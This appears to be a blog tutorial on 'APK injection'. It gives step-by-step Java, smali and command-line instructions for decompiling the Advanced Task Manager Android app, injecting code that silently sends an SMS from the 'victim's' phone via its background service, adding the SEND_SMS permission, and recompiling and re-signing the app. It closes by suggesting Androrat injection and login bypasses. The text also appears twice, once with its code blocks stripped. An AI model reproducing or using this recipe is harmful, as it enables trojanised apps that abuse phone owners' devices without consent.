In this basic tutorial we are only going to scratch the surface on apk injection.
We will take an application, Advanced Task Manager in this case - and inject a Very basic piece of code
allowing us to send ourselves a SMS from the victims android phone. The possibilities are endless, but let's keep it simple for now.
We will first create our code using Eclipse > Decompile it > Decompile the target App > Add our code + Permission(s) > Recompile > And finally Sign it.
Requirements:
Java
Eclipse
Android SDK
APKTool
SignApk
Some Android Apps
Notepad++
APKTool: Click Me
Download both pktool1.5.2.tar.bz2 and apktool-install-windows-r05-ibot.tar.bz2 and extract them to the same folder named apktool.
SignApk: Click Me
Extract into your apktool folder.
I assume you have all of the above installed, if not there's a ton of tutorials on how to do so. I wont explain it here, as that would be a
tutorial in itself - and a pretty lame one that is. Notepad++ is optional, but it makes it easier to read the decompiled smali codes.
The reason for using smali instead of dex2jar, is that the decompiled java files are a Pain-In-The-Ass to get working, and often corrupted.
Let's get started!
Step 1
Code:
a) Import the SMSManager by adding this under your imports:Code:
b) Add the following piece of code at the buttom of the class before the } :
Code:
Change the phoneNumber to your own so you'll be able to see if it works.
c) In public void onCreate add this beneath setContentView(R.layout.activity_main); - Before the } :Code:
This will call our SendSMS method. The exception is not necessary, but it's damn good practise in all languages.
The full code should look like this:Code:
Code:
This permission will allow us to programmatically send the SMS.
e) Either run the application in the emulator and copy the *.apk from the bin folder, or Right click the project > Export > Android > Export Android Application > New Key > Fill out the info.
Now comes the fun parts.
Step 2
Copy your newly created .apk file into your APKTool folder > Open up CMD and go to your APKTool folder (Inside CMD-Using the Change Directory "cd" command) > Now runthis command:
Code:
This will decompile your apk into a folder named 'yourfolder'.
Step 3
Same as in Step 2. This time we'll just decompile the Advanced Task Manager Application into another folder named 'ATM'(Remember to copy it into your apktool folder):
Code:
Make sure you have a copy of the apk in the apktool folder.
Step 4
Now open the MainActivity.smali file inside Notepad++ to see what it looks like:
What we need is the call for our method inside OnCreate:
Code:
And our SendSMS method near the buttom:
Because ATM is a service, it allows the application to work in the background and even boot on startup if the permissions are set. Looking in the decompiled AndroidManifest.xml file we see:
Code:
If the application wasn't a Service, we would be looking for an activity called upon application launch like the one below:
Code:
Step 5
Open up the TaskManagerService.smali file inside Notepad++ and look for the public method onCreate.
Inside the OnCreate method, look for :try_start_0 as shown in our own compiled-decompiled apk. If it isn't there(Which it isn't in this case) just go to the buttom of the OnCreatemethod before the method is returned (.end method)
Now paste the first code (The call) as shown here:
Code:
Make sure to change the path from Lcom/test/test2/MainActivity (Your package/MainActivity) to Lmobi/infolife/taskmanagerpro/TaskManagerService (ATM package/TheClassWeAreInjectingInto) as we are not including our own class, but injecting the code straight into a pre-existing one.
Now scroll all the way down to thebottom - After the last method. The location is not that important at this time, but try to get as close to another public method as possible for the sake of organisation and being able to quickly find the method again.
Here we will paste our entire SendSMS method as shown in Step 4. Note that you can delete all the .line xx's as those are for debugging and wont be on their true locations anyway.
Step 6
Now open ATM's decompiled AndroidManifest.xml file to add the permission (If not already added by the application itself/It isn't in this case):
Code:
Add it Before the <application tag and under the other permissions.
Step 7
Now save all the edited files, and get ready to recompile.
In your CMD window (Still open from the decompiling - Be sure you're in the apktool dir) type this to recompile into a new .apk:
Code:
Step 8
Now we need to sign the apk in order to be able to install it. If your signapk.jar is located in the same dir as apktool(It is in this case) type the following into CMD:
Code:
And now our method is injected, the apk is recompiled, signed and ready to be installed.
Install it on your own device using adb/dropbox/whatever in order to verify that it indeed works.
remember to edit the string to your own number, otherwise you'll have to debug in order to know if it works.
This is extremely basic stuff, but the possibilities are endless. Try injecting functions from Androrat when you're done. And remember you can inject entire applications, and then call the activities/services inside the target application Some applications are obfuscated too, and that's when it really starts to get fun :)
And if you find this interesting you can start reversing the applications in order to bypass logins, win games, find database vulnerabilities etc. Again.... Endless ;)
Wrote it pretty fast, so let me know if you find any errors. I'll make sure to take a look myself later aswell :)
We will take an application, Advanced Task Manager in this case - and inject a Very basic piece of code
We will first create our code using Eclipse > Decompile it > Decompile the target App > Add our code + Permission(s) > Recompile > And finally Sign it.
Requirements:
Java
Eclipse
Android SDK
APKTool
SignApk
Some Android Apps
Notepad++
APKTool: Click Me
Download both pktool1.5.2.tar.bz2 and apktool-install-windows-r05-ibot.tar.bz2 and extract them to the same folder named apktool.
SignApk: Click Me
Extract into your apktool folder.
I assume you have all of the above installed, if not there's a ton of tutorials on how to do so. I wont explain it here, as that would be a
tutorial in itself - and a pretty lame one that is. Notepad++ is optional, but it makes it easier to read the decompiled smali codes.
The reason for using smali instead of dex2jar, is that the decompiled java files are a Pain-In-The-Ass to get working, and often corrupted.
Let's get started!
Step 1
Code:
In Eclipse > File > New > Other > Android Application Project > Give it a name > Next > Next > Next > Finish.
a) Import the SMSManager by adding this under your imports:Code:
import android.telephony.SmsManager;
b) Add the following piece of code at the buttom of the class before the } :
Code:
public void sendSMS() {
String phoneNumber = "+00123456789";
String message = "WTF? It works!";
SmsManager smsManager = SmsManager.getDefault();
smsManager.sendTextMessage(phoneNumber, null, message, null, null);
}
Change the phoneNumber to your own so you'll be able to see if it works.
c) In public void onCreate add this beneath setContentView(R.layout.activity_main); - Before the } :Code:
try {
sendSMS();
} catch (Exception e) {
e.printStackTrace();
}
This will call our SendSMS method. The exception is not necessary, but it's damn good practise in all languages.
The full code should look like this:Code:
package com.test.test2;d) Go to your AndroidManifest.xml file and add this Before '<application' :
import android.os.Bundle;
import android.app.Activity;
import android.telephony.SmsManager;
import android.view.Menu;
public class MainActivity extends Activity {
@Override
public void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_main);
try {
sendSMS();
} catch (Exception e) {
e.printStackTrace();
}
}
@Override
public boolean onCreateOptionsMenu(Menu menu) {
getMenuInflater().inflate(R.menu.activity_main, menu);
return true;
}
public void sendSMS() {
String phoneNumber = "+00123456789";
String message = "WTF? It works!";
SmsManager smsManager = SmsManager.getDefault();
smsManager.sendTextMessage(phoneNumber, null, message, null, null);
}
}
Code:
<uses-permission android:name="android.permission.SEND_SMS" />
This permission will allow us to programmatically send the SMS.
e) Either run the application in the emulator and copy the *.apk from the bin folder, or Right click the project > Export > Android > Export Android Application > New Key > Fill out the info.
Now comes the fun parts.
Step 2
Copy your newly created .apk file into your APKTool folder > Open up CMD and go to your APKTool folder (Inside CMD-Using the Change Directory "cd" command) > Now runthis command:
Code:
apktool.bat d yourfile.apk yourfolder
This will decompile your apk into a folder named 'yourfolder'.
Step 3
Same as in Step 2. This time we'll just decompile the Advanced Task Manager Application into another folder named 'ATM'(Remember to copy it into your apktool folder):
Code:
apktool.bat d "Advanced Task Manager.apk" ATM
Make sure you have a copy of the apk in the apktool folder.
Step 4
Now open the MainActivity.smali file inside Notepad++ to see what it looks like:
Code:
.class public Lcom/test/test2/MainActivity;
.super Landroid/app/Activity;
.source "MainActivity.java"
# direct methods
.method public constructor <init>()V
.locals 0
.prologue
.line 8
invoke-direct {p0}, Landroid/app/Activity;-><init>()V
return-void
.end method
# virtual methods
.method public onCreate(Landroid/os/Bundle;)V
.locals 2
.parameter "savedInstanceState"
.prologue
.line 17
invoke-super {p0, p1}, Landroid/app/Activity;->onCreate(Landroid/os/Bundle;)V
.line 18
const/high16 v1, 0x7f03
invoke-virtual {p0, v1}, Lcom/test/test2/MainActivity;->setContentView(I)V
.line 23
:try_start_0
invoke-virtual {p0}, Lcom/test/test2/MainActivity;->sendSMS()V
:try_end_0
.catch Ljava/lang/Exception; {:try_start_0 .. :try_end_0} :catch_0
.line 32
:goto_0
return-void
.line 24
:catch_0
move-exception v0
.line 25
.local v0, e:Ljava/lang/Exception;
invoke-virtual {v0}, Ljava/lang/Exception;->printStackTrace()V
goto :goto_0
.end method
.method public onCreateOptionsMenu(Landroid/view/Menu;)Z
.locals 2
.parameter "menu"
.prologue
.line 40
invoke-virtual {p0}, Lcom/test/test2/MainActivity;->getMenuInflater()Landroid/view/MenuInflater;
move-result-object v0
const/high16 v1, 0x7f06
invoke-virtual {v0, v1, p1}, Landroid/view/MenuInflater;->inflate(ILandroid/view/Menu;)V
.line 41
const/4 v0, 0x1
return v0
.end method
.method public sendSMS()V
.locals 6
.prologue
const/4 v2, 0x0
.line 47
const-string v1, "+00123456789"
.line 48
.local v1, phoneNumber:Ljava/lang/String;
const-string v3, "WTF? It works!"
.line 50
.local v3, message:Ljava/lang/String;
invoke-static {}, Landroid/telephony/SmsManager;->getDefault()Landroid/telephony/SmsManager;
move-result-object v0
.local v0, smsManager:Landroid/telephony/SmsManager;
move-object v4, v2
move-object v5, v2
.line 51
invoke-virtual/range {v0 .. v5}, Landroid/telephony/SmsManager;->sendTextMessage(Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Landroid/app/PendingIntent;Landroid/app/PendingIntent;)V
.line 52
return-void
.end methodWhat we need is the call for our method inside OnCreate:
Code:
invoke-virtual {p0}, Lcom/test/test2/MainActivity;->sendSMS()V
And our SendSMS method near the buttom:
Code:
.method public sendSMS()V
.locals 6
.prologue
const/4 v2, 0x0
.line 47
const-string v1, "+00123456789"
.line 48
.local v1, phoneNumber:Ljava/lang/String;
const-string v3, "WTF? It works!"
.line 50
.local v3, message:Ljava/lang/String;
invoke-static {}, Landroid/telephony/SmsManager;->getDefault()Landroid/telephony/SmsManager;
move-result-object v0
.local v0, smsManager:Landroid/telephony/SmsManager;
move-object v4, v2
move-object v5, v2
.line 51
invoke-virtual/range {v0 .. v5}, Landroid/telephony/SmsManager;->sendTextMessage(Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Landroid/app/PendingIntent;Landroid/app/PendingIntent;)V
.line 52
return-void
.end methodBecause ATM is a service, it allows the application to work in the background and even boot on startup if the permissions are set. Looking in the decompiled AndroidManifest.xml file we see:
Code:
<service android:name="mobi.infolife.taskmanagerpro.TaskManagerService" android:exported="false" />
If the application wasn't a Service, we would be looking for an activity called upon application launch like the one below:
Code:
<activity android:label="@string/app_name" android:name=".MainActivity"
Step 5
Open up the TaskManagerService.smali file inside Notepad++ and look for the public method onCreate.
Inside the OnCreate method, look for :try_start_0 as shown in our own compiled-decompiled apk. If it isn't there(Which it isn't in this case) just go to the buttom of the OnCreatemethod before the method is returned (.end method)
Now paste the first code (The call) as shown here:
Code:
invoke-virtual {p0}, Lmobi/infolife/taskmanagerpro/TaskManagerService;->sendSMS()V
Make sure to change the path from Lcom/test/test2/MainActivity (Your package/MainActivity) to Lmobi/infolife/taskmanagerpro/TaskManagerService (ATM package/TheClassWeAreInjectingInto) as we are not including our own class, but injecting the code straight into a pre-existing one.
Now scroll all the way down to thebottom - After the last method. The location is not that important at this time, but try to get as close to another public method as possible for the sake of organisation and being able to quickly find the method again.
Here we will paste our entire SendSMS method as shown in Step 4. Note that you can delete all the .line xx's as those are for debugging and wont be on their true locations anyway.
Step 6
Now open ATM's decompiled AndroidManifest.xml file to add the permission (If not already added by the application itself/It isn't in this case):
Code:
<uses-permission android:name="android.permission.SEND_SMS" />
Add it Before the <application tag and under the other permissions.
Step 7
Now save all the edited files, and get ready to recompile.
In your CMD window (Still open from the decompiling - Be sure you're in the apktool dir) type this to recompile into a new .apk:
Code:
apktool.bat b -f ATM advancedtaskmanagerecompile.apk
b for build
-f for forcing it not to check for changed resources.
ATM is where you decompiled the ATM apk to.
advancedtaskmanagerecompile.apk is the name of the output file when built.
Step 8
Now we need to sign the apk in order to be able to install it. If your signapk.jar is located in the same dir as apktool(It is in this case) type the following into CMD:
Code:
java -jar signapk.jar testkey.x509.pem testkey.pk8 advancedtaskmanagerecompile.apk advancedtaskmanagerecompilesigned.apk
And now our method is injected, the apk is recompiled, signed and ready to be installed.
Install it on your own device using adb/dropbox/whatever in order to verify that it indeed works.
remember to edit the string to your own number, otherwise you'll have to debug in order to know if it works.
This is extremely basic stuff, but the possibilities are endless. Try injecting functions from Androrat when you're done. And remember you can inject entire applications, and then call the activities/services inside the target application Some applications are obfuscated too, and that's when it really starts to get fun :)
And if you find this interesting you can start reversing the applications in order to bypass logins, win games, find database vulnerabilities etc. Again.... Endless ;)
Wrote it pretty fast, so let me know if you find any errors. I'll make sure to take a look myself later aswell :)
No comments:
Post a Comment